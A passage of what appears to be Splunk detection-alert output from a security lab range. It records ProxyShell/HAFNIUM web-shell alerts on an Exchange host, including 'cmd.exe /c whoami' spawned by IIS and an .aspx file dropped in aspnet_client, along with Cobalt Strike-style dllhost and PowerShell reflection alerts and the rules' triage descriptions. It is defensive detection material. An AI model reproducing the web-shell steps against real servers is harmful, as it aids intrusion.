Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="2", dest="exchange01.attackrange.local", firstTime="2022-10-03T17:45:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T17:45:30", original_file_name="unknown", parent_process="C:\\Windows\\System32\\inetsrv\\w3wp.exe", process="C:\\Windows\\System32\\cmd.exe /c whoami", process_name="cmd.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="EXCHANGE01$" 1664816400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664816400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="5564", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664816400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664816400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="24404", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664816400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664816400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="0x5f54", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664816400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664816400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x15bc", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664820560, search_name="ESCU - Detect Exchange Web Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 90, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\", \"T1190\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"file_name\", \"role\": [\"Victim\"], \"type\": \"File Name\"}]}", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", annotations.mitre_attack="T1190", dest="exchange01.attackrange.local", file_create_time="2022-10-03 17:45:19.576", file_name="xjuwi.aspx", file_path="C:\\inetpub\\wwwroot\\aspnet_client\\xjuwi.aspx", info_max_time="+Infinity", info_min_time="0.000", process_name="System", risk_message="A file - xjuwi.aspx was written to disk that is related to IIS exploitation previously performed by HAFNIUM. Review further file modifications on endpoint exchange01.attackrange.local by user $user$.", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="81.0", savedsearch_description="The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell. Paths include: `\\HttpProxy\\owa\\auth\\`, `\\inetpub\\wwwroot\\aspnet_client\\`, and `\\HttpProxy\\OAB\\`. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant.", threat_object="xjuwi.aspx", threat_object_type="file name" 1664819733, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T16:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T16:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664819733, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T16:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T16:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664819733, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T16:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T16:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664819733, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T16:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T16:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664819031, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="528", dest="exchange01.attackrange.local", firstTime="2022-10-03T16:10:48", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T16:13:54", original_file_name="unknown", parent_process="unknown", process="unknown", process_name="cmd.exe", process_name="powershell.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="unknown" 1664812800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664812800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], 